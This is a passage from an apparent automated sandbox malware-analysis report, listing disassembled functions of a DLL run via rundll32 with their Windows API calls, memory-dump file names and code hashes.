                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1532457625-0
                                                                                                                      • Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                      • Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
                                                                                                                      • Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                      • Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10022C16 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                        • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                      • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                      • _strtol.LIBCMT ref: 10022CB5
                                                                                                                      • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                        • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211061542-0
                                                                                                                      • Opcode ID: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                      • Instruction ID: 5151050668a075cb653ef24e642dff21439099837a3a94c33d4a4bfb9d6c905b
                                                                                                                      • Opcode Fuzzy Hash: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                      • Instruction Fuzzy Hash: 352127755002556FDB21DFB49C81BAEB7F8DF48241FA14066F984D7240DB709D40CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10027B2E Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ArrayDestroyFreeSafeTask
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253174383-0
                                                                                                                      • Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                      • Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
                                                                                                                      • Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                      • Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100266ED Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2161412305-0
                                                                                                                      • Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                      • Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
                                                                                                                      • Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                      • Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001FCED Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1615547351-0
                                                                                                                      • Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                      • Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
                                                                                                                      • Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                      • Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017081 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                      • Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
                                                                                                                      • Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                      • Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10015123 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                        • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                      • __strdup.LIBCMT ref: 1001514C
                                                                                                                      • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4206445780-0
                                                                                                                      • Opcode ID: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                      • Instruction ID: 8b11c4afa576c4c19aa6f664ae71e644c3fa519ec3c9c99d11d7e99696a9cddb
                                                                                                                      • Opcode Fuzzy Hash: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                      • Instruction Fuzzy Hash: C2218EB0801B40DFC722CF7A854525AFBF8FFA4601F14891FE59A8A721DBB4A481CF04
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017709 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                      • _swprintf.LIBCMT ref: 10017768
                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4210924919-0
                                                                                                                      • Opcode ID: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                      • Instruction ID: e9188d0bda7618ab121d067f9e2349c71729dbb6fdaec1ca83b1d39ed15240a7
                                                                                                                      • Opcode Fuzzy Hash: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                      • Instruction Fuzzy Hash: A901C072500219FBEB00DF648D85FAFB3BCEF09704F010429FA05EB181EAB0E90187A5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017C4C Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                      • Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
                                                                                                                      • Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                      • Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002665D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3354205298-0
                                                                                                                      • Opcode ID: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                      • Instruction ID: 41f5bb3622a22b3bbc1aebe7228573581b0e45adc76bddbe530eb5e3d74ee13d
                                                                                                                      • Opcode Fuzzy Hash: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                      • Instruction Fuzzy Hash: C6111C7690021AEFDF01DF94CC89EDE7BB9FF09245F004061FA04DA011E7719645CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021616 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                      • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                      • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3704204646-0
                                                                                                                      • Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                      • Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
                                                                                                                      • Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                      • Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100155B8 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetFocus.USER32 ref: 10015607
                                                                                                                      • GetParent.USER32(?), ref: 10015615
                                                                                                                      • SendMessageA.USER32 ref: 10015628
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211600527-0
                                                                                                                      • Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                      • Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
                                                                                                                      • Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                      • Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001B96E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2353593579-0
                                                                                                                      • Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                      • Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
                                                                                                                      • Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                      • Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001B32D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                        • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                      • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 369458955-0
                                                                                                                      • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                      • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                      • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                      • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003C9F5 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
